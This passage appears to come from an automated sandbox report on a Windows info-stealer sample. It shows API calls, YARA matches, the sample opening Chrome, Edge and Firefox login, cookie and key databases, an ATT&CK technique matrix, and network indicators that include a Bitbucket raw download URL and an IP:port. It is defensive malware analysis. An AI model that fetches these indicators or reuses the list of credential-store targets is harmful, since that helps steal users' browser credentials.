                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_007E4CBF
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: EnumSystemLocalesW,0_2_007E4F6B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: EnumSystemLocalesW,0_2_007E4FB6
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D038F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007D038F

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe PID: 6500, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe PID: 6500, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Screen Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
                  Obfuscated Files or Information
                  LSASS Memory21
                  Security Software Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Data from Local System
                  2
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS23
                  System Information Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging13
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe42%ReversingLabsWin32.Trojan.PovertyStealer
                  SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
                  http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://bitbucket.org/fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                  146.70.169.164:22270%Avira URL Cloudsafe
                  https://bitbucket.org/0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bitbucket.org
                  104.192.141.1
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://bitbucket.org/fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupeefalse
                    • Avira URL Cloud: safe
                    unknown
                    146.70.169.164:2227true
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ac.ecosia.org/autocomplete?q=SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://bitbucket.org/SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/chrome_newtabSecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoSecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://x1.c.lencr.org/0SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://x1.i.lencr.org/0SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crt.rootca1.amazontrust.com/rootca1.cer0?SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.rootca1.amazontrust.com/rootca1.crl0SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
